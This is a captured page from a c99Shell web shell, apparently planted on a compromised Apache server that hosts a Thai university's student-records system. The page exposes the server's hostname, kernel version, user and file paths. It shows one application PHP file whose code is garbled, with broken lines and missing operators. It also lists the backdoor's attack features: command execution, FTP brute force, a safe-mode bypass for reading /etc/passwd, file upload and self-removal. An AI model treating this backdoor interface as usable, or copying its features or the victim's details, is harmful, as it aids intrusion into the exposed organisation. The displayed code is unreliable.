!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis2222/application/views/esa/   drwxr-xr-x
Free 50.65 GB of 127.8 GB (39.63%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     v_pop_mb.php (3.14 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php echo form_open("esa/attend/mb_insert_update", array("name" => "myform""id" => "myform")); ?>
<table class='tb_1' border="0" width="100%">
    <tr class='light'>
        <th align="center">เลือก</th>
        <th align="center">ลำดับ</th>
        <th align="center">รหัสนักศึกษา</th>
        <th align="center">ชื่อ - สกุลนักศึกษา</th>
        <th align="center">หลักสูตร</th>
        <th align="center">ชั้นปี</th>
    </tr>
<?php
    
if (isset($rs_std) && $rs_std->num_rows()) {
        
$i 1;
        foreach (
$rs_std->result() as $row_std) {
            if ((
$i 2) == 0)
                
$class 'light3';
            else
                
$class 'light2';
?>
    <tr class=<?php echo $class;?>>
        <td align="center"><input type="checkbox" class="std_id" id="std_id[]" name="std_id[]" value="<?php echo $row_std->stdId;?>" /></td>
        <td align="center"><?php echo $i;?></td>
        <td align="center"><?php echo $row_std->stdCode;?></td>
        <td><?php echo $row_std->stdName.'  '.$row_std->stdSurname;?></td>
        <td><?php echo $row_std->curName;?></td>
        <td align="center"><?php echo $row_std->stdSyId;?></td>
    </tr>
<?php
            $i
++;
        }
    } else {
?>
    <tr class='notfound'>
        <td colspan="6" align="center"><?php echo $this->config->item('sa_not_found');?></td>
    </tr>
<?php
    
}
?>
    <tr>
        <td colspan="6"><input type="button" id="chkAll" name="chkAll" value="เลือกทั้งหมด" onClick="setChk('std_id', true)" />
        <input type="button" id="chkCancel" name="chkCancel" value="ยกเลิกทั้งหมด" onClick="setChk('std_id', false)" /></td>
    </tr>
</table>
<div align="center"><input type="submit" id="btnSubmit" name="btnSubmit" value="บันทึก" /></div>
<input type="hidden" id="type" name="type" value="<?php echo $type;?>" />
<input type="hidden" id="choice" name="choice" value="<?php echo $choice;?>" />
<input type="hidden" id="mb_smo_id" name="mb_smo_id" value="<?php echo $mb_smo_id;?>" />
<input type="hidden" id="mb_cl_id" name="mb_cl_id" value="<?php echo $mb_cl_id;?>" />
<input type="hidden" id="mb_mpj_id" name="mb_mpj_id" value="<?php echo $mb_mpj_id;?>" />
<input type="hidden" id="mb_acp_id" name="mb_acp_id" value="<?php echo $mb_acp_id;?>" />
<input type="hidden" id="mb_year" name="mb_year" value="<?php echo $mb_year;?>" />
<input type="hidden" id="mb_tmId" name="mb_tmId" value="<?php echo $mb_tmId;?>" />
<input type="hidden" id="mb_syId" name="mb_syId" value="<?php echo $mb_syId;?>" />
<input type="hidden" id="mb_fr_date" name="mb_fr_date" value="<?php echo $mb_fr_date;?>" />
<input type="hidden" id="mb_to_date" name="mb_to_date" value="<?php echo $mb_to_date;?>" />
<input type="hidden" id="cur_id" name="cur_id" value="<?php echo $cur_id;?>" />
<input type="hidden" id="sy_id" name="sy_id" value="<?php echo $sy_id;?>" />
<?php echo form_close();?>

<?php
if ($choice == "") {
?>
<script>
self.window.opener.location.reload(true);
window.close();
</script>
<?php
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.018 ]--